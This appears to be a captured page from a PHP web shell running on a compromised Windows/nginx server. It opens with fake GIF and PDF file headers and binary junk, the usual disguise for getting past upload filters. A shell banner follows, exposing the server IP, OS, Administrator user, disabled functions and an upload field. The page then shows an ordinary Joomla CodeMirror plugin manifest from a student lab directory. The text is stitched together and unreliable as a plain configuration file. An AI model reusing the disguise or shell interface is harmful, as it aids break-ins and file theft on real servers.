GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/Joomla/plugins/editors/codemirror/ |
Upload File : |
<?xml version="1.0" encoding="utf-8"?> <extension version="2.5" type="plugin" group="editors"> <name>plg_editors_codemirror</name> <version>1.0</version> <creationDate>28 March 2011</creationDate> <author>Marijn Haverbeke</author> <authorEmail>N/A</authorEmail> <authorUrl></authorUrl> <copyright></copyright> <license></license> <description>PLG_CODEMIRROR_XML_DESCRIPTION</description> <files> <filename plugin="codemirror">codemirror.php</filename> <filename>index.html</filename> </files> <languages> <language tag="en-GB">en-GB.plg_editors_codemirror.ini</language> <language tag="en-GB">en-GB.plg_editors_codemirror.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="linenumbers" type="radio" default="0" description="PLG_CODEMIRROR_FIELD_LINENUMBERS_DESC" label="PLG_CODEMIRROR_FIELD_LINENUMBERS_LABEL" > <option value="0">JOFF</option> <option value="1">JON</option> </field> <field name="tabmode" type="radio" default="indent" description="PLG_CODEMIRROR_FIELD_TABMODE_DESC" label="PLG_CODEMIRROR_FIELD_TABMODE_LABEL" > <option value="indent">PLG_CODEMIRROR_FIELD_VALUE_TABMODE_INDENT</option> <option value="shift">PLG_CODEMIRROR_FIELD_VALUE_TABMODE_SHIFT</option> </field> </fieldset> </fields> </config> </extension>